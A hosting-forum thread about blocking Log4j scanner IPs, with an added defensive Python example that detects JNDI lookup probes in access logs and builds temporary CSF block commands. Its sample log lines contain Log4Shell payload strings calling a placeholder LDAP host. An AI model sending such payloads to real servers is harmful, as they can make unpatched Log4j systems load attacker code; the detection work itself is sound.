Hosters should block, ASAP, IPs and IP blocks that are used to scan for Log4j

ikkeben

While, for example:

Because of the extremely rapid growth, Checkpoint is speaking of a "cyber pandemic".

And we all have problems, high CPU and more, or worse, also very much extra CLIMATE pollution (CO2) by those... :(
 
> And we all have problems, high CPU and more
We are?
Didn't notice it yet. We do have lots of scans for Log4j. But it's almost undoable to block all those IPs. So many different IPs.
So best is to block only those who really are causing high load.
 
> We are?
> Didn't notice it yet. We do have lots of scans for Log4j. But it's almost undoable to block all those IPs. So many different IPs.
> So best is to block only those who really are causing high load.

Forum users here ;)

Not that we should block, but the hoster or main network infrastructure level.

Yes, so many IPs, so nice to have, while those could give an overview of hacked boxes and where what the hackers use, and then block them all.

Create a CENTRAL ban/block list for the hosters (put their heads together) in the EU ASAP, and sweep the whole network in the EU much cleaner then.

A one-time hell of a chance to get most of those ... in a quick clean-sweep action; the time is now.

So they stick their heads out now; then do take the one chance to cut off most of it from the web, so they must start over to get so many IPs and hacked boxes, which are useless if all are centrally blocked.
 
Not the best idea, as innocent hosters or servers will be blocked that way too.
That's just why some of us are having trouble getting out of some spam systems, because they block ASNs.

I think the best solution is the same one which is used for mail. Just block the IPs temporarily. We only need some entry to put in the regexp of CSF so it will detect and block it.
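
The detect-and-temporarily-block approach suggested in the post above, as an added example that is not from the thread or from CSF itself: it scans web access-log lines for the Log4j lookup prefix (plain or percent-encoded) and builds `csf -td` temporary-deny commands per source IP. The log lines, the one-hour TTL, the comment text and all function names are assumptions made for this illustration.

```python
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Dec/2021:10:01:02 +0000] "GET /?q=${jndi:ldap://placeholder.invalid/a} HTTP/1.1" 404 153 "-" "curl/7.68.0"
203.0.113.7 - - [14/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.invalid/a}"
198.51.100.23 - - [14/Dec/2021:10:02:11 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fplaceholder.invalid%2Fa%7D HTTP/1.1" 404 153 "-" "Mozilla/5.0"
192.0.2.50 - - [14/Dec/2021:10:03:40 +0000] "GET /docs/log4j-upgrade.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined-log-format prefix: client IP, two ident fields, timestamp, then the rest.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] (?P<rest>.*)$')
# Matches only the literal lookup prefix; this is a simple signature, not a full parser.
PROBE_RE = re.compile(r'\$\{jndi:', re.IGNORECASE)

def is_probe(text):
    """True if the request line, referer or user agent carries the lookup prefix."""
    # Decode twice so single and double percent-encoding are both normalised.
    return bool(PROBE_RE.search(unquote(unquote(text))))

def find_scanners(log_text):
    """Count probe lines per source IP."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_probe(m.group("rest")):
            hits[m.group("ip")] += 1
    return hits

def temp_block_commands(hits, ttl_seconds=3600, min_hits=1):
    """Build 'csf -td <ip> <ttl> <comment>' lines; nothing is executed here."""
    cmds = []
    for ip, count in sorted(hits.items()):
        try:
            ipaddress.ip_address(ip)  # never pass an unvalidated log field to a shell
        except ValueError:
            continue
        if count >= min_hits:
            cmds.append(f"csf -td {ip} {ttl_seconds} log4j-probe")
    return cmds

if __name__ == "__main__":
    for cmd in temp_block_commands(find_scanners(SAMPLE_LOG)):
        print(cmd)
```

Because the block is temporary, an address that was shared or has since been cleaned up drops off the list on its own when the TTL expires.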
 
> I think the best solution is the same one which is used for mail. Just block the IPs temporarily. We only need some entry to put in the regexp of CSF so it will detect and block it.

Maybe locally, yes, but then those "hacked boxes" are still staying online and nothing has changed about that, so there must be more to protect the WEB against this and others; for all, if zero-day, those types of attacks should be blocked beforehand.

While updates are then often too late, where central blocking could prevent a lot more?

On ASN, hmm, that is a bad blocking procedure.
 